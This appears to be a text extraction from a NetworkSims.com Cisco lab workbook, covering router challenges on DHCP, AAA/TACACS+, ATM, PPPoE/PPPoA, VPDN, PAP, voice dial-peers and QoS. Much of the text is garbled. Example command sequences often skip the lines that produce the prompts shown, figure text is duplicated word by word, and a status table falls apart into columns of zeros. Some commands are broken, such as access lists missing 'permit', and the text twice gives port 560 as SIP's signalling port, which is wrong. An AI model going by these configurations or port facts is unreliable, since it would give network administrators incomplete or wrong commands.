CTunnel
Dialer
FastEthernet
Lex
Loopback
MFR
Multilink
Port-channel
Tunnel
Vif
Virtual-PPP
Virtual-TokenRing
tr ?
Tracked object number
Async interface
CDMA Ix interface
CTunnel interface
Dialer interface
Lex interface
Loopback interface
Tunnel interface
Virtual PPP interface
Virtual TokenRing
HSRP uses a priority scheme to determine the default active router. The active router is
assigned a higher priority than all the other HSRP-configured routers (the default priority is
100). It uses multicast messages to advertise priority among HSRP-configured routers. Thus,
if the active router fails to send these messages within a certain time (defined in the timers
option), the standby router with the highest priority takes over.
NetworkSims.com
772

Outline
This challenge involves the configuration of a DHCP server on the router.
Objectives
Setup a DHCP server.

Setup a DHCP Pool.
Define DHCP networks and subnets.
Define DHCP parameters, such as DNS, NetBios, Timeout and domain.
Example
> en
# config t
(config-dhcp)# exit
(config)# ip dhcp ?
conflict
database
excluded-address
ping
pool
relay
smart-relay

Outline
Objectives
NetworkSims.com
773
Define AAA.
Example
> enable
# config t

Outline
Objectives
Define AAA.
Example
> enable
# config t
attribute
authorization
challenge-noecho
Access-Challenge
configure-nas
deadtime
directed-request
domain-stripping
host
key
local
password
retransmit
NetworkSims.com
774
timeout
unique-ident
vsa
(config)# aaa ?
accounting
authorization
configuration
nas
new-model
OLD commands.)
processes
arap
banner
enable
fail-message
login
nasi
ppp
WORD
enable
group
Use Server-group
line
local
none
NO authentication.
arap
banner
enable
fail-message
login
nasi
ppp
WORD
commands
exec
network
reverse-access
NetworkSims.com
775

WORD
enable
group
Use Server-group
line
local

Outline
Objectives
Define AAA.
Example
> enable
# config t

Outline
This challenge involves the configuration of a Tacacs+ server for privilidges.
Objectives
Define AAA.
NetworkSims.com
776
Define privileges.
Example
> enable
# config t
Explanation

access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where
NetworkSims.com

Reset functions
Exit from the EXEC
Lock the terminal
Exit from the EXEC
Send echo messages
777
Thus:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
privilege
privilege
privilege
privilege
privilege
privilege

exec level 7 ping

Outline
Objectives

Example
> enable
# config t
password bert
nopassword
privilege 15
privilege 1
user-maxlinks 2
access-class 9
Explanation
NetworkSims.com
778

access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where

Reset functions
Exit from the EXEC
Lock the terminal
Exit from the EXEC
Send echo messages
Thus:

Outline
This challenge involves the configuration Tacacs+ for accounting.
NetworkSims.com
779
Objectives
Define Tacacs+.
Example
> enable
# config t

Outline
This challenge involves the configuration of ATM.
Objectives
Define E0.
Define ATM.
Define bridge protocol.
Example
> enable
# config t
(config)# int e0
(config-if)# exit
(config)# int atm0
(config-if)# ?
access-expression
apollo
Apollo interface subcommands
appletalk
arp
atm
Modify ATM parameters
backup
bandwidth
bridge-group
carrier-delay
NetworkSims.com
780
cdp
class-int
clns
crypto
custom-queue-list
decnet
default
delay
description
dspu
exit
fair-queue
fras
help
hold-queue
ip
ipv6
ipx
isis
iso-igrp
lan-name
lane
lat
llc2
load-interval
locaddr-priority
logging
loopback
mac-address
map-group
mls
mpls
mpoa
mtu
multilink-group
multiring
netbios
no
ntp
priority-group
pvc
random-detect
rate-limit
sap-priority
service-policy
shutdown
smrp
sna
snapshot
snmp
source-bridge
squelch
sscop
standby
svc
tag-switching
tarp
timeout
NetworkSims.com

Configure default vc-class name
Down Stream PU
DLC Switch Interface Command
IS-IS commands
LAN Name command
Modify LANE parameters
LAT commands
interface
Assign a priority group
Configure static map group
mls sub/interface commands
Configure MPLS interface parameters
MPOA interface configuration commands
Enable RIF usage for a routable protocol
name-caching
Configure NTP
Configure ATM PVC parameters
Interface
Rate Limit
subcommands
SNA pu configuration
Configure interface for source-route bridging
10BaseT 100 meter limit enforcement
SSCOP Interface Subcommands
Interface HSRP configuration commands
Configure ATM SVC parameters
Tag Switching interface configuration commands
781
traffic-shape

Sub-Interface
transmit-interface
interface
vines
VINES interface subcommands
xns
XNS interface subcommands
(config-if)# pvc ?
<0-7>
Enter VPI/VCI value(slash required)
<1-1023> Enter VCI value
WORD
Optional handle to refer to this connection
(config-if-atm-vc)# ?
ATM virtual circuit configuration commands:
atm
atm pvc commands
broadcast
Pseudo-broadcast
class-vc
default
dialer
set dialer pool this pvc belongs to
encapsulation Select ATM Encapsulation for VC
exit-vc
Exit from ATM VC configuration mode
ilmi
Configure ILMI management
inarp
Change the inverse arp timer on the PVC
no
oam
Configure oam parameters
oam-pvc
Send oam cells on this pvc
pppoe-client
pppoe client
protocol
Map an upper layer protocol to this connection.
ubr
Enter Unspecified Peak Cell Rate (pcr) in Kbps.
ubr+
Enter Peak Cell Rate(pcr)Minimum Cell Rate(mcr) in Kbps.
vbr-nrt
Enter Variable Bit Rate (pcr)(scr)(bcs)
vcci
VCC Identifier
(config-if-atm-vc)# encapsulation ?
aal5ciscoppp Cisco PPP over AAL5 Encapsulation
aal5mux
AAL5+MUX Encapsulation
aal5nlpid
AAL5+NLPID Encapsulation
aal5snap
AAL5+LLC/SNAP Encapsulation
(config-if)# exit
Explanation
In this case a bridge is created between the E0 and the ATM0 port. The encapsulation is
aal5snap (AAL5 Link Control/Subnet Access Protcol) which supports multiple protocols
over the same PVC.

Outline
NetworkSims.com
782
This challenge involves the configuration of ATM with a dialer interface and to encapsulate
PPP within an Ethernet environment.
Objectives
Define a dialer
Define ATM.
Example
> enable
# config t
(config)# int atm0
(config-if)# pvc ?
<0-7>
WORD
atm
atm pvc commands
broadcast
Pseudo-broadcast
class-vc
default
dialer
exit-vc
ilmi
inarp
no
oam
oam-pvc
pppoe-client
pppoe client
protocol
ubr
ubr+
vbr-nrt
vcci
VCC Identifier
(config-if-atm-vc)# pppoe-client dial-pool-number 1
(config-if)# exit
Explanation
PPPoE encapsulates PPP within an Ethernet frame.
NetworkSims.com
783

Outline
This challenge involves the configuration of PPPoA with NAT
Objectives
Define a dialer.
Define ATM.
Example
> enable
# config t
(config)# int e0
(config-if)# exit
(config)# int atm0
atm
atm pvc commands
broadcast
Pseudo-broadcast
class-vc
default
dialer
exit-vc
ilmi
inarp
no
oam
oam-pvc
pppoe-client
pppoe client
protocol
ubr
ubr+
vbr-nrt
vcci
VCC Identifier
(config-atm-vc)# encapsulation aal5mux ppp dialer
(config-atm-vc)# dialer pool member 1
(config-if)# exit
NetworkSims.com
784

(config-if)# exit
(config)# ip nat inside source list 10 interface dialer0 overload
(config)# ip route 0.0.0.0 0.0.0.0 dialer0
Explanation
PPPoA encapsulates PPP within ATM cells.

Outline
This challenge involves the configuration of ATM for VPDN.
Objectives
Define a dialer
Define ATM.
Example
> enable
# config t
(config)# vpdn enable
(config)# vpdn-group ?
WORD VPDN Group name
(config)# vpdn-group test
(config-vpdn)# ?
VPDN group configuration commands:
accept-dialin
VPDN accept-dialin group configuration
accept-dialout
VPDN accept-dialout group configuration
default
description
Description for this VPDN group
exit
Exit from VPDN group configuration mode
ip
IP settings for tunnel
no
redirect
Call redirection options
request-dialin
VPDN request-dialin group configuration
request-dialout VPDN request-dialout group configuration
source
Configuration source for this vpdn-group
source-ip
Set source IP address for this vpdn-group
vpn
VPN ID/VRF name
NetworkSims.com
785
(config-vpdn)# request-dialin ?
<cr>
(config-vpdn)# request-dialin
(config-vpdn-req-in)# ?
VPDN group request-dialin configuration commands:
default
dnis
Initiate a tunnel based on DNIS
domain
Initiate a tunnel based on domain name
exit
Exit from VPDN group request dialin sub-configuration mode
multihop Initiate a multihop tunnel based on peer hostname or tunnel ID
no
protocol Tunneling protocol to be used
(config-vpdn-req-in)# protocol ?
l2f
Use L2F
l2tp
Use L2TP
pptp
Use PPTP
pppoe Use PPPoE
(config-vpdn-req-in)# protocol pppoe
(config-vpdn-req-in)# exit
(config-vpdn)# exit
(config)# int e0
(config-if)# exit
(config)# int atm0
(config-if)# ?
access-expression
apollo
appletalk
arp
atm
backup
bandwidth
bridge-group
carrier-delay
cdp
class-int
clns
crypto
custom-queue-list
decnet
default
delay
description
dspu
Down Stream PU
exit
fair-queue
fras
help
hold-queue
ip
ipv6
ipx
isis
IS-IS commands
iso-igrp
lan-name
LAN Name command
lane
lat
LAT commands
llc2
load-interval
NetworkSims.com
786
interface
name-caching
no
ntp
Configure NTP
priority-group
pvc
random-detect
Interface
rate-limit
Rate Limit
sap-priority
service-policy
shutdown
smrp
subcommands
sna
snapshot
snmp
source-bridge
squelch
sscop
standby
svc
tag-switching
tarp
timeout
traffic-shape
Sub-Interface
transmit-interface
interface
vines
xns
atm
atm pvc commands
broadcast
Pseudo-broadcast
class-vc
default
dialer
exit-vc
ilmi
inarp
no
oam
oam-pvc
pppoe-client
pppoe client
protocol
ubr
locaddr-priority
logging
loopback
mac-address
map-group
mls
mpls
mpoa
mtu
multilink-group
multiring
netbios
NetworkSims.com
787
ubr+
vbr-nrt
vcci
VCC Identifier
(config-if-atm-vc)# pppoe-client dial-pool-number 1
(config-if)# exit

Outline
This challenge involves the configuration of interactive PPP sessions.
Objectives

Define line parameters.
Example
> enable
# config t
(config-if)# async ?
default Specify default parameters
dynamic Specify parameters which user may change
mode
Specify line mode (interactive or dedicated interface use)
(config-if)# async mode ?
dedicated
Line is dedicated as an async interface
interactive Line may be switched between interactive use and async interface
(config-if)# async mode interactive
(config-if)# exit
(config)# line 1
arap
NetworkSims.com
788
ppp
slip
timeout
<cr>
(config-line)# autoselect during-login

Outline
This challenge involves the configuration of interface addressing method for local devices.
Objectives

Define loopback parameters.
Example
> enable
# config t
(config-if)# exit
(config-if)# ip unnumbered loopback1

Outline
NetworkSims.com
789
This challenge involves the configuration of a specific address for the dial-in host.
Objectives

Example
> enable
# config t
(config-if)# peer default ip address 192.168.1.1
Explanation
Once it has connected it assigns the connected host with the IP address of 192.168.1.1 (Figure
1).
Async 6
PSTN
>> enable
enable
## config
config tt
(config)#
(config)# int
int async
async 66
(config-if)#
peer
(config-if)# peer default
default ip
ip address
address 192.168.1.1
192.168.1.1

address of 192.168.1.1
Figure 1: Host assigned a fixed IP address

Outline
This challenge involves the configuration of the allocation of the address for the dial-in host
using a local pool.
NetworkSims.com
790
Objectives

Define local pool of address for remote host.
Example
> enable
# config t
(config-if)# peer default ip address pool testing
Explanation
Once it has connected it assigns the connected host with an IP address from the pool of
addresses from 10.0.0.1 to 10.0.0.10 (see Figure 1).
Async 6
PSTN
(config)#
(config)# int
int async
async 66
(config-if)#
(config-if)# peer
peer default
default ip
ip address
address pool
pool testing
testing
(config)#
ip
local
pool
testing
10.0.0.1
10.0.0.10

Pool of 10.0.0.1 to
10.0.0.10
Figure 1: Host assigned an address from the local pool

Outline
This challenge involves the configuration of DHCP allocation address for the dial-in host
using a DHCP pool.
Objectives
NetworkSims.com
791

Define a DHCP pool.
Example
> enable
# config t
(config-if)# peer default ip address dhcp-pool wyoming
(config-dhcp)# exit
(config)# ip dhcp ?
conflict
database
excluded-address
ping
pool
relay
smart-relay
Explanation
Once it has connected it assigns the connected host with the IP address of taking from the
dhcp pool (Figure 1).
NetworkSims.com
792
Async 6
PSTN
address from the DHCP pool
(config)#
(config)# int
int async
async 66
(config-if)#
(config-if)# peer
peer default
default ip
ip address
address dhcp-pool
dhcp-pool wyoming
wyoming
(config)#
(config)# ip
ip dhcpd
dhcpd pool
pool wyoming
wyoming
(config-dhcp)#
(config-dhcp)# network
network 249.189.108.0
249.189.108.0 255.255.255.0
255.255.255.0
(config-dhcp)#
(config-dhcp)# dns-server
dns-server 249.189.108.58
249.189.108.58
(config-dhcp)#
netbios-name-server
249.189.108.61
(config-dhcp)#
(config-dhcp)# lease
lease 33
(config-dhcp)#
(config-dhcp)# default-router
default-router 249.189.108.87
249.189.108.87
(config-dhcp)#
(config-dhcp)# exit
exit
(config)#ip
(config)#ip dhcp
dhcp excluded-address
excluded-address 249.189.108.26
249.189.108.26
(config)#
(config)# ip
ip dhcp
dhcp ping
ping timeout
timeout 350
350

Outline
This challenge involves the configuration for PAP.
Objectives

Define local address.
Define PAP details.
Example
> enable
# config t
(config)# hostname edinburgh
(config)# username newyork password test
(config-if)# dialer map ip 192.168.1.2 name newyork
(config-if)# ppp pap sent-username edinburgh password ttt
Explanation
NetworkSims.com
793
In this example the username is set as the hostname of the remote device. Figure 1 shows an
example configuration for two devices, on which either can connect to the other.
Async 6
PSTN
>> enable
enable
## config
config tt
(config)#
(config)# hostname
hostname edinburgh
edinburgh
(config)#
(config)# username
username newyork
newyork password
password test
test
(config)#
(config)# int
int async
async 66
(config-if)#
encapsulation ppp
ppp
(config-if)#
(config-if)# ppp
ppp authentication
authentication pap
pap
(config-if)#
ip
address
192.168.1.1
255.255.255.0
(config-if)#
(config-if)# dialer
dialer map
map ip
ip 192.168.1.2
192.168.1.2 name
name newyork
newyork
(config-if)#
(config-if)# ppp
ppp pap
pap sent-username
sent-username edinburgh
edinburgh password
password ttt
ttt
>> enable
enable
## config
config tt
(config)#
(config)# hostname
hostname newyork
newyork
(config)#
(config)# username
username edinburgh
edinburgh password
password ttt
ttt
(config)#
(config)# int
int async
async 66
(config-if)#
encapsulation ppp
ppp
(config-if)#
(config-if)# ppp
ppp authentication
authentication pap
pap
(config-if)#
(config-if)# ip
ip address
address 192.168.1.2
192.168.1.2 255.255.255.0
255.255.255.0
(config-if)#
dialer
map
ip
192.168.1.1
(config-if)# dialer map ip 192.168.1.1 name
name edinburgh
edinburgh
(config-if)#
(config-if)# ppp
ppp pap
pap sent-username
sent-username newyork
newyork password
password test
test
NetworkSims.com
794
17 CCNP ONT
Outline
This challenge involves the configuration of a dial-peer.
Objectives
Setup a dial-peer.
Example
> enable
# config t
Router(config)# dial-peer ?
cor
Class of Restriction
hunt
Define the dial peer hunting choice
outbound
Define the outbound options
terminator Define the address terminate character
voice
Voice type
Router(config)# dial-p v ?
<1-2147483647> Voice dial-peer tag
Router(config)# dial-p voice 1 ?
mmoip Multi Media Over IP
pots
Telephony
voatm Voice over ATM
vofr
Voice over Frame Relay
voip
Voice over IP
Router(config)# dial-p voice 1 pots
Router(config-dial-peer)# ?
DIALPEER configuration commands:
answer-address
The Call Destination Number
application
The selected application
call-block
Incoming Call Blocking
capacity
capacity update timer config
carrier-id
Configure Carrier ID
clid
Caller ID option
corlist
set the Class of Restriction lists
default
description
Dialpeer specific description
destination-pattern
A full E.164 telephone number prefix
digit-strip
Use digit strip option for the POTS digits replacement
direct-inward-dial
Use Called Number as final call destination
NetworkSims.com
795
dnis-map
exit
fax
forward-digits
The name of a configured dnis-map

Exit from dial-peer configuration mode
Configure fax
Configure the destination digits forward of this
dialpeer
huntstop
Stop hunting on Dial-Peers
incoming
Incoming called number
information-type
Information type for dialpeer
max-conn
Sets the maximum connections per peer, negation sets
to unlimited
no
numbering-type
The calling/called party numbering type
permission
set the call orig/term permission of this dialpeer
preference
Configure the preference order of this dialpeer
prefix
The pattern to be dialed before the dialed num
register
Register the E.164 number of this dial peer with
gatekeeper
resource
Resource allocation policy
session
The session [ target | protocol | transport ] for this
peer
shutdown
Change the Admin State of this peer to down (no->up)
supplementary-service Config supplementary service features
supported-language
Language(s) supported by the peer
tgrep
TGREP config
tone
Generate tones
translate-outgoing
Translation rule
translation-profile
Translation profile
trunk-group-label
Configure Trunk Group Label
trunkgroup
trunk groups associated with this peer
voice
Configure GATEWAY dial-peer for voice services
voice-class
Set Dial-peer voice class control parameters
Router(config-dial-peer)# destination-pattern ?
WORD A sequence of digits - representing the prefix or full telephone number
Router(config-dial-peer)# destination-pattern 11
Router(config-dial-peer)# port 1/1/1
Router(config-dial-peer)# exit
Router(config)# dial-p voice 2 voip
Router(config-dial-peer)# ?
acc-qos
The Minimally Acceptable Quality of Service to be
used in getting to this peer
answer-address
application
call
Per Voip dial-peer Call configuration
call-block
carrier-id
clid
Caller ID option
codec
The codec rate to be attempted in getting to this peer
corlist
default
description
destination-pattern
dnis-map
dtmf-relay
Transport DTMF digits across IP link
exit
expect-factor
Expectation Factor of voice quality
fax
Configure fax
fax-relay
fax-relay options
huntstop
icpif
Calculated Planning Impairment Factor
incoming
NetworkSims.com
796
ip
max-conn
Set ip packet options

to unlimited
max-redirects
Configure the max number of redirects for this
dialpeer
modem
Modem commands through this peer
no
numbering-type
permission
playout-delay
Configure voice playout delay buffer
preference
req-qos
The desired Quality of Service to be used in
getting to this peer
roaming
Use roaming server
rtp
RTP config
session
peer
settle-call
Use settlement server
shutdown
signal-type
The signaling type to be used when getting to this
peer
signaling
Signaling payload handling
snmp
Modify SNMP voice peer parameters
tech-prefix
The H.323 gateway technology prefix
tone
Generate tones
translate-outgoing
Translation rule
translation-profile
Translation profile
trunk-group-label
trunkgroup
vad
Use VoiceActivityDetection as necessary option
voice
voice-class
Router(config-dial-peer)# destination-pattern 22
Router(config-dial-peer)# session ?
protocol
The session protocol to be used in getting to this peer
target
The session target for this peer
transport The transport layer protocol used for this peer
Router(config-dial-peer)# sess target ?
WORD A string specifying the session target
Router(config-dial-peer)# session target ipv4:1.2.3.4

Outline
This challenge involves the configuration of QoS (bandwidth and queue-limit).
Objectives
Define QoS.
Limit the bandwidth.
Define a queue-limit.
NetworkSims.com
797
Example
> en
# config t
(config)# class-map ?
WORD
class-map name
match-all Logical-AND all matching statements under this classmap
match-any Logical-OR all matching statements under this classmap
(config-cmap)#?
exit
match
no
rename
(config-cmap)# exit
(config-pmap)# ?
class
policy criteria
exit
no
rename
<cr>
Router(config-pmap-c)# ?
bandwidth
Bandwidth
exit
fair-queue
Enable Flow-based Fair Queuing in this Class
no
police
Police
priority
Strict Scheduling Priority for this Class
queue-limit
Queue Max Threshold for Tail Drop
random-detect
Enable Random Early Detection as drop policy
set
Set QoS values
shape
Traffic Shaping
<cr>
(config-pmap-c)# bandwidth ?
<8-2000000> Kilo Bits per second
percent
% of Available Bandwidth
(config-pmap-c)# queue-limit ?
<1-512> Packets
(config-pmap)# exit
(config)# int s0
NetworkSims.com
798
The class map defines the traffic.

Outline
This challenge involves the configuration of QoS (default-class).
Objectives
Define QoS.
Define a default class.
Example
> en
# config t
(config)# class-map ?
WORD
class-map name
match-all Logical-AND all matching statements under this classmap
match-any Logical-OR all matching statements under this classmap
(config-cmap)#?
exit
match
no
rename
(config-cmap)# exit
(config-pmap)# ?
class
policy criteria
exit
no
rename
<cr>
Router(config-pmap-c)# ?
bandwidth
Bandwidth
exit
fair-queue
no
police
Police
priority
NetworkSims.com
799
queue-limit
random-detect
set
Set QoS values
shape
Traffic Shaping
<cr>
percent
% of Available Bandwidth
(config-pmap-c)# queue-limit ?
<1-512> Packets
(config-pmap)# class ?
WORD
class-map name
class-default
System default class matching otherwise unclassified
packets
(config-pmap)# class class-default
(config-pmap-c)# fair-queue
(config-pmap)# exit
(config)# int s0
The class-default class does not have to be created before it is used in the policy-map. It is
supports any other traffic which does not match the class maps.

Outline
This challenge allows the maximum bandwidth to be defined.
Objectives
Define QoS.
Define interesting traffic types with a class-map.
# config t
(config)# access-list 100 permit tcp host 165.246.68.4 host 200.194.252.5 eq echo
(config)# class-map Delaware
(config-cmap)# ?
exit
match
no
rename
(config-cmap)# description testing
NetworkSims.com
800
access-group
Access group
any
Any packets
class-map
Class map
cos
IEEE 802.1Q/ISL class of service/user priority values
discard-class
Discard behavior identifier
dscp
Match DSCP in IP(v4) and IPv6 packets
fr-de
Match on Frame-relay DE bit
fr-dlci
Match on fr-dlci
input-interface
ip
IP specific values
mpls
not
packet
Layer 3 Packet length
precedence
Match Precedence in IP(v4) and IPv6 packets
protocol
Protocol
qos-group
Qos-group
source-address
Source address
(config-cmap)# match protocol ?
arp
IP ARP
bgp
Border Gateway Protocol
bridge
Bridging
bstun
Block Serial Tunnel
cdp
citrix
Citrix Traffic
cuseeme
CU-SeeMe desktop video conference
custom-01
Custom protocol custom-01
custom-02
custom-03
custom-04
custom-05
custom-06
custom-07
custom-08
custom-09
custom-10
dhcp
Dynamic Host Configuration
dlsw
dns
Domain Name Server lookup
egp
Exterior Gateway Protocol
eigrp
Enhanced Interior Gateway Routing Protocol
exchange
MS-RPC for Exchange
fasttrack
FastTrack Traffic - KaZaA, Morpheus, Grokster...
finger
Finger
ftp
gnutella
Gnutella Traffic - BearShare,LimeWire,Gnotella...
gopher
Gopher
gre
Generic Routing Encapsulation
http
World Wide Web traffic
icmp
Internet Control Message
imap
ip
IP
ipinip
IP in IP (encapsulation)
ipsec
IP Security Protocol (ESP/AH)
ipv6
IPV6
irc
Internet Relay Chat
kazaa2
Kazaa Version 2
kerberos
Kerberos
l2tp
L2F/L2TP tunnel
ldap
llc2
llc2
NetworkSims.com
801
napster
Napster Traffic
netbios
NetBIOS
netshow
Microsoft Netshow
nfs
Network File System
nntp
notes
Lotus Notes(R)
novadigm
Novadigm EDM
ntp
Network Time Protocol
pad
PAD links
pcanywhere
Symantec pcANYWHERE
pop3
Post Office Protocol
pppoe
PPP over Ethernet
pptp
Point-to-Point Tunneling Protocol
printer
print spooler/lpd
qllc
qllc protocol
rcmd
BSD r-commands (rsh, rlogin, rexec)
rip
Routing Information Protocol
rsrb
rsvp
Resource Reservation Protocol
rtp
Real Time Protocol
rtspplayer
RTSP players streaming protocol
secure-ftp
FTP over TLS/SSL
secure-http
Secured HTTP
secure-imap
Internet Message Access Protocol over TLS/SSL
secure-irc
Internet Relay Chat over TLS/SSL
secure-ldap
Lightweight Directory Access Protocol over TLS/SSL
secure-nntp
Network News Transfer Protocol over TLS/SSL
secure-pop3
Post Office Protocol over TLS/SSL
secure-telnet Telnet over TLS/SSL
smtp
snapshot
snmp
socks
SOCKS
sqlnet
SQL*NET for Oracle
sqlserver
MS SQL Server
ssh
Secured Shell
streamwork
Xing Technology StreamWorks player
stun
Serial Tunnel
sunrpc
Sun RPC
syslog
System Logging Utility
telnet
Telnet
tftp
vdolive
VDOLive streaming video
vofr
voice over Frame Relay packets
xwindows
X-Windows remote access
(config-cmap)# match protocol http
(config-cmap)# match protocol ftp
(config-cmap)# match protocol telnet
(config-cmap)# match access-list 100
(config-cmap)# exit
(config)# class-map VOICE
(config-cmap)# exit
(config)# class-map EXECTEST
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# ?
class
policy criteria
exit
no
rename
<cr>
NetworkSims.com
802
(config-pmap)# description test

(config-pmap)# class Delaware
(config-pmap-c)# ?
bandwidth
Bandwidth
exit
fair-queue
no
police
Police
priority
queue-limit
random-detect
set
Set QoS values
shape
Traffic Shaping
<cr>
(config-pmap-c)# police ?
<8000-2000000000> Bits per second
cir
Committed information rate
(config-pmap-c)# police 1000 ?
<1000-512000000> Burst bytes
bc
Conform burst
conform-action
action when rate is less than conform burst
pir
Peak Information Rate
<cr>
(config-pmap-c)# police 1000 500
(config-pmap-c-police)# ?
QoS Class Police configuration commands:
conform-action action when rate is less than conform burst
exceed-action
action when rate is within conform and conform + exceed burst
exit
Exit from Police configuration mode
no
violate-action action when rate is greater than conform + exceed burst
(config-pmap-c-police)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Outline
This challenge involves the configuration of CBWFQ.
Objectives
Define CBWFQ.
Example
> en
NetworkSims.com
803
# config t
0.0.255.255
(config-cmap)# exit
(config-pmap)# exit
(config)# int s0
Explanation
2Mbps:
Class
map
Identify traffic
characteristic
Policy
map
Service
policy
Define the
policy for the
traffic
Apply the
policy to
an interface
# policy-map pmap
# class-map cmap
# int s0
Ref:

NetworkSims.com
804
Outline
This challenge involves the configuration of auto QoS on an interface.
Objectives
Define CEF (Cisco Express Forwarding), as this is required for Auto QoS.
Enable NBAR (Network Based Application Recognition), as this is required for Auto
QoS.
Define the bandwidth on an interface.
Enable Auto QoS.
Example
> en
# config t
(config)# ip cef
(config)# int s0
(config-if)# bandwidth ?
<1-10000000> Bandwidth in kilobits
inherit
Specify how bandwidth is inherited
(config-if)# ip nbar ?
protocol-discovery Enable NBAR protocol discovery
(config-if)# ip nbar protocol ?
<cr>
(config-if)# ip nbar protocol
(config-if)# auto ?
trust Trust the DSCP marking
<cr>
(config-if)# auto qos voip
(config-if)# exit
(config)# exit
# sh ip nbar pr
Serial0/0
Input
Output
Protocol
Packet Count
Packet Count
Byte Count
Byte Count
5 minute bit rate (bps)
5 minute bit rate
(bps)
------------------------ ------------------------ ----------------------bgp
0
0
NetworkSims.com
805
citrix
cuseeme
custom-01
custom-02
custom-03
custom-04
custom-05
custom-06
custom-07
custom-08
custom-09
custom-10
dhcp
dns
egp
eigrp
exchange
fasttrack
finger
NetworkSims.com
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
806
ftp
gnutella
gopher
gre
http
icmp
imap
ipinip
ipsec
irc
kazaa2
kerberos
l2tp
ldap
napster
netbios
netshow
nfs
nntp
NetworkSims.com
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
807
notes
novadigm
ntp
pcanywhere
pop3
pptp
printer
rcmd
rip
rsvp
rtp
rtspplayer
secure-ftp
secure-http
secure-imap
secure-irc
secure-ldap
secure-nntp
secure-pop3
NetworkSims.com
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
808
secure-telnet
smtp
snmp
socks
sqlnet
sqlserver
ssh
streamwork
sunrpc
syslog
telnet
tftp
vdolive
xwindows
unknown
Total
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
Explanation
Key facts:
CCNP Objective: QoS Implementation Methods.
NetworkSims.com
809
AutoQoS for the Enterprise is the next generation of QoS generation, and uses NBAR
for traffic discovery and classification. The basic Auto QoS is Auto QoS VoIP.
For Auto QoS to work, CEF and NBAR must be enabled. Also the bandwidth must be
correctly defined on the interface.
AutoQoS automatically generate QoS commands.
AutoQoS analyzes network traffic and tries to optimize the QoS through traffic classes
that the AutoQoS Discovery method to create policies, which are applied to the
interface(s).
AutoQoS simplifies the configuration.
AutoQoS uses Classification (This uses AutoQoS Discovery with NBAR to discover the
requirements); Policy generation (This uses access-lists, class-maps and policy maps to
optimize the setup); Configuration (This configures the required interfaces);
Monitoring and reporting (This continually updates and reports on the operation); and
Consistancy (This allows for consistancy across a range of devices).

Outline
This challenge involves the configuration of QoS on VoIP traffic (H.323).
Objectives
Define an ACL for VoIP (H.323).

Define QoS on VoIP traffic.
Define bit rate and a burst rate for the VoIP traffic.
Example
> en
# config t
(config)# access-list 100 udp any any range 16384 32767
(config)# access-list 100 tcp any any eq 1720
(config)# class-map VOIP
(config-cmap)# exit
(config-pmap)# class VOIP
<8000-2000000000> Bits per second
cir
<1000-512000000> Burst bytes
NetworkSims.com
810
bc
Conform burst
conform-action
pir
<cr>
(config-pmap)# exit
(config)# int e0
In this case VoIP is detected on TCP port 1720 and on UDP ports from 16384 to 32767:
The main classification for VoIP are:
H.323. TCP port 1720 is used for H.323 Host Call, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in MS Messenger, and so on.
H.323 (Callserve). UDP port 1719 and TCP port 1720 are used for call signalling, and
UDP ports from 5000 to 65535 for RTP (Realtime Transport Protocol). This is used in
Callserve, and so on.
SIP. TCP/UDP port 560 is used for signaling, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in SIP, and so on.

Outline
This challenge involves the configuration of QoS on VoIP traffic (SIP).
Objectives
Define an ACL for VoIP (SIP).

Example
> en
# config t
(config)# access-list 100 udp any any eq 560
NetworkSims.com
811

(config-cmap)# exit
<8000-2000000000> Bits per second
cir
<1000-512000000> Burst bytes
bc
Conform burst
conform-action
pir
<cr>
(config-pmap)# exit
(config)# int e0
In this case VoIP is detected on TCP/UDP port 560 for the call setup and on UDP ports from
16384 to 32767 for the actual call traffic:
The main classification for VoIP are:
H.323. TCP port 1720 is used for H.323 Host Call, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in MS Messenger, and so on.
H.323 (Callserve). UDP port 1719 and TCP port 1720 are used for call signalling, and
UDP ports from 5000 to 65535 for RTP (Realtime Transport Protocol). This is used in
Callserve, and so on.
SIP. TCP/UDP port 560 is used for signaling, and UDP ports from 16384 to 32767 for
RTP (Realtime Transport Protocol). This is used in SIP, and so on.

Outline
Objectives

NetworkSims.com
812
Example
> en
# config t
(config-cmap)# exit
percent
% of total Bandwidth
remaining
% of the remaining bandwidth
(config-pmap)# exit
